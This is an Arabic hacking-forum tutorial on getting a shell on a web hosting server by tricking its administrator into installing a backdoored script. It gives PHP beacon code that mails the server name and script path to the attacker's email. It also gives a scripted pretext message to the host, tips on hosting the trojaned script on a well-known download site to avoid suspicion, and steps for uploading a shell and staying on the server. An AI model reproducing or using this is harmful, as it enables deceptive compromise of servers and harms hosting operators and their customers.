بسم اله الرحمن الرحيم
ان شاء الله المواضع هيحكي عن احد طرق استهدف تعتمد على الهندسة الاجتماعية
نفرض انه في سيرفر عاوزين شل عليه وسيرفر ما فيه ولا ثغرة تساعدنا ,
الفكر تكمن بتلغيم احد السكربتات بي نوع ثغرة
انا عملت تلغيم بملف بكود ابلود + كود تبليغ مسار موقع علشان يرسل على الايميك خاص
كود تبليغ
كود PHP:
$ms = $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
$sub = "ضحية (; " . $ms;
$ee = '[email protected]';
$send = @mail($ee,$sub,$ms);
مع تغير [email protected] الى ايميلك خاص
الان اهم خطو وهي كيف اجعل مدير سيرفر يركب سكربت ملغم على سيرفر
نراسل استضافة من خلال تذكرة او من اتصال بنا او الايميل
لكان افضل طريقة تواصل غير مباشره مثل رساله
رسالة هتكون كتالي
كود PHP:
السلام عليكم ورحمة الله وبركاته
ممكن استفسار :
انا عاوز اعمل موقع وعاوز اركب عليه سكربت "سكربت يكون غير مشهور"
ووجهتني مشاكل كتير مع استضافة اخري بسبب انه في مشكلة عند تنصيب سكربت
وكان سبب انه في سيرفرات ما تدعم سكربت ويحدث مشكلة
هل سكربت شغال عندكم بدون مشكلة عن تنصيب
رابط تحميل سكربت :)
نص رساله السابق برجع لك واسلوبك في اقناع
بعد انتهاء من المراسلة انتظر رد
99% هيكون رد اجابي
وهيقولك انه سيرفر يدعم سكربت بدون مشاكل
الان راجع ايميلك الذى ضفته سابقا فى السكربت الملغم وبعد كدا هتشوف المفاجئه
بعده تستغل ثغرة ترفع شلك وتثبت نفسك ع سيرفر
بعد كدا ترجع انت تراسلهم وتحاول تعمل معاهم مشكلة باتفاق على سعر استضافة
علشان تنهي موضوع معهم بطريق جيده بدون شك
-----
الان ننكلم عن بعض ملاحظات
1- ببالنسبة الى اين سيرفع سكربت صاحب استضافة
- غالباً ما يكون على نفس استضافة بمجلد demo >> وراح تكون ضرب اقوي
- او يكون صاحب سيرفر عامل يوزر خاص بـ demo
2- بنسبا للسكربت هعمل فيه تلغيم
سكربت يفضل يكون غير معروف كما تم ذكر سابقاً
يعني مش هيمشي لو عملت على سكربت vBulletin او جملة او ورد برس او ...الخ من سكربت مشهور
لانه اكيد هيكون متركب على سيرفر
3- بالنسبة الى رابط تحميل سكربت
افضل يكون مرفوع على موقع مشهور من مركز تحميل ترايدنت
ليه يكون مركز مشهور؟ للابتعاد عن الشك
اصاحب الاستضافات اول ما تشوف برابط كلمة traidnt راح يرتاح نفسنا ههههه
الى هنا ننتهي من موضوع وان شاء الله نرجع مع موضوع جديد
تحياتي لكم جميعا